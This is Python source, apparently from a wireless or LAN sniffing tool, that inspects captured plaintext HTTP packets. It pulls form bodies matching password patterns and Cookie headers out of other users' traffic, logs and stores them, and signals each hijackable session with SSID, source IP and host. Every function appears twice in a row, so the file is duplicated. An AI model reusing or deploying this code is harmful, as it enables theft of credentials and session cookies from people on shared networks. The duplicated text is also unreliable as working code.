def ontothosepackets(self, pkt):
    """Inspect one captured packet for a plaintext HTTP request.

    Packets lacking an IP or TCP layer, and payloads that do not begin with
    ``POST`` or ``GET``, are dropped without further work. The checks are
    string prefixes on the TCP payload, so only unencrypted HTTP can match.

    For a matching request the method hands the extracted text to
    ``extractPwd`` (calling ``MonsterLogger.storeForm`` on a hit), passes the
    ``Cookie`` header value to ``MonsterLogger.storeCookie``, and emits the
    ``cookieFound`` signal with ``(ssid, source, host)``, the cookie and the
    user agent when host and cookie are truthy and ``self.my_ip != None``.
    What ``storeForm``/``storeCookie`` persist is not visible from here.

    Always returns ``None``.
    """
    if IP not in pkt or TCP not in pkt:
        return

    payload_text = str(pkt['TCP'].payload)

    try:
        if payload_text.startswith("POST"):
            MonsterLogger.logger.error("post pkt!")
            # Slice starts 4 past the position find() reports for CRLFCRLF.
            body_offset = payload_text.find("\r\n\r\n") + 4
            form_text = payload_text[body_offset:]
            request_line = payload_text[4:payload_text.find("\r\n")]
            uri = request_line[:payload_text.find("HTTP")].strip()
        elif payload_text.startswith("GET"):
            # For GET the trimmed request line doubles as the text to scan.
            request_line = payload_text[3:payload_text.find("\r\n")]
            uri = request_line[:payload_text.find("HTTP")].strip()
            form_text = uri
        else:
            return
    except IndexError:
        # Kept as the "invalid packet" exit.
        return

    host = self.extractheader(payload_text, "Host")
    source = str(pkt['IP'].src)
    useragent = self.extractheader(payload_text, "User-Agent")

    if self.extractPwd(form_text):
        MonsterLogger.storeForm(useragent, host, uri, form_text)

    # str.split always yields at least one element, so this guard never fires.
    if not payload_text.split("Cookie"):
        return

    cookie = self.extractheader(payload_text, "Cookie")
    MonsterLogger.storeCookie(useragent, host, uri, cookie)

    # To save calculation time the SSID is assumed to sit in the first
    # Dot11Elt, e.g. <Dot11Elt ID=SSID len=14 info='MERCURY_xxxxx'>.
    if Ether in pkt:
        ssid = "Ether"
    elif Dot11Elt in pkt:
        ssid = pkt[Dot11Elt][0].info
    else:
        ssid = "Unknown"

    if not (host and cookie and self.my_ip != None):
        return

    MonsterLogger.logger.critical("cookie found!")
    self.emit(SIGNAL("cookieFound"), (ssid, source, host), cookie, useragent)
def ontothosepackets(self, pkt):
    """Inspect one captured packet for a plaintext HTTP request.

    Packets lacking an IP or TCP layer, and payloads that do not begin with
    ``POST`` or ``GET``, are dropped without further work. The checks are
    string prefixes on the TCP payload, so only unencrypted HTTP can match.

    For a matching request the method hands the extracted text to
    ``extractPwd`` (calling ``MonsterLogger.storeForm`` on a hit), passes the
    ``Cookie`` header value to ``MonsterLogger.storeCookie``, and emits the
    ``cookieFound`` signal with ``(ssid, source, host)``, the cookie and the
    user agent when host and cookie are truthy and ``self.my_ip != None``.
    What ``storeForm``/``storeCookie`` persist is not visible from here.

    Always returns ``None``.
    """
    if IP not in pkt or TCP not in pkt:
        return

    payload_text = str(pkt['TCP'].payload)

    try:
        if payload_text.startswith("POST"):
            MonsterLogger.logger.error("post pkt!")
            # Slice starts 4 past the position find() reports for CRLFCRLF.
            body_offset = payload_text.find("\r\n\r\n") + 4
            form_text = payload_text[body_offset:]
            request_line = payload_text[4:payload_text.find("\r\n")]
            uri = request_line[:payload_text.find("HTTP")].strip()
        elif payload_text.startswith("GET"):
            # For GET the trimmed request line doubles as the text to scan.
            request_line = payload_text[3:payload_text.find("\r\n")]
            uri = request_line[:payload_text.find("HTTP")].strip()
            form_text = uri
        else:
            return
    except IndexError:
        # Kept as the "invalid packet" exit.
        return

    host = self.extractheader(payload_text, "Host")
    source = str(pkt['IP'].src)
    useragent = self.extractheader(payload_text, "User-Agent")

    if self.extractPwd(form_text):
        MonsterLogger.storeForm(useragent, host, uri, form_text)

    # str.split always yields at least one element, so this guard never fires.
    if not payload_text.split("Cookie"):
        return

    cookie = self.extractheader(payload_text, "Cookie")
    MonsterLogger.storeCookie(useragent, host, uri, cookie)

    # To save calculation time the SSID is assumed to sit in the first
    # Dot11Elt, e.g. <Dot11Elt ID=SSID len=14 info='MERCURY_xxxxx'>.
    if Ether in pkt:
        ssid = "Ether"
    elif Dot11Elt in pkt:
        ssid = pkt[Dot11Elt][0].info
    else:
        ssid = "Unknown"

    if not (host and cookie and self.my_ip != None):
        return

    MonsterLogger.logger.critical("cookie found!")
    self.emit(SIGNAL("cookieFound"), (ssid, source, host), cookie, useragent)
def extractPwd(self, juicyInfo):
    """Report whether ``juicyInfo`` contains every item of some pattern.

    ``self.patterns`` is walked in order; each pattern is itself iterated and
    every item is looked up with ``juicyInfo.find``. The first pattern whose
    items are all present is logged, the text is handed to
    ``MonsterLogger.printJuicyForm``, and ``True`` is returned. When no
    pattern matches the function falls off the end and returns ``None``.

    The full input is written to the logger at error level before any
    matching, so the log output holds whatever text was passed in whether or
    not a pattern matched and needs the same handling as the capture itself.
    """
    MonsterLogger.logger.error("juicyInfo: " + juicyInfo)

    for pattern in self.patterns:
        MonsterLogger.logger.error("pattenr:" + str(pattern))

        # all() stops at the first missing item, like the original break.
        if not all(juicyInfo.find(item) != -1 for item in pattern):
            continue

        MonsterLogger.logger.critical("find pwd info!")
        MonsterLogger.logger.critical("matched mattern: " + str(pattern))
        MonsterLogger.printJuicyForm(juicyInfo)
        return True
def extractPwd(self, juicyInfo):
    """Report whether ``juicyInfo`` contains every item of some pattern.

    ``self.patterns`` is walked in order; each pattern is itself iterated and
    every item is looked up with ``juicyInfo.find``. The first pattern whose
    items are all present is logged, the text is handed to
    ``MonsterLogger.printJuicyForm``, and ``True`` is returned. When no
    pattern matches the function falls off the end and returns ``None``.

    The full input is written to the logger at error level before any
    matching, so the log output holds whatever text was passed in whether or
    not a pattern matched and needs the same handling as the capture itself.
    """
    MonsterLogger.logger.error("juicyInfo: " + juicyInfo)

    for pattern in self.patterns:
        MonsterLogger.logger.error("pattenr:" + str(pattern))

        # all() stops at the first missing item, like the original break.
        if not all(juicyInfo.find(item) != -1 for item in pattern):
            continue

        MonsterLogger.logger.critical("find pwd info!")
        MonsterLogger.logger.critical("matched mattern: " + str(pattern))
        MonsterLogger.printJuicyForm(juicyInfo)
        return True
def incoming(self, infos, cookie, ua):
    """Add a cookie entry to the model, print it, and expand the widget.

    ``infos``, ``cookie`` and ``ua`` are passed unchanged to
    ``self.model.addCookie``. ``infos[2]`` is printed as the host, so
    ``infos`` must be indexable with at least three elements. Finishes by
    calling ``expandAll`` on ``self.cookieWidget``. Returns ``None``.
    """
    self.model.addCookie(infos, cookie, ua)

    # The summary line carries the raw cookie value into the printed output.
    summary = "ua: %s cookie %s host %s" % (ua, cookie, infos[2])
    MonsterLogger.printJuicyCookie(summary)

    self.cookieWidget.expandAll()
def incoming(self, infos, cookie, ua):
    """Add a cookie entry to the model, print it, and expand the widget.

    ``infos``, ``cookie`` and ``ua`` are passed unchanged to
    ``self.model.addCookie``. ``infos[2]`` is printed as the host, so
    ``infos`` must be indexable with at least three elements. Finishes by
    calling ``expandAll`` on ``self.cookieWidget``. Returns ``None``.
    """
    self.model.addCookie(infos, cookie, ua)

    # The summary line carries the raw cookie value into the printed output.
    summary = "ua: %s cookie %s host %s" % (ua, cookie, infos[2])
    MonsterLogger.printJuicyCookie(summary)

    self.cookieWidget.expandAll()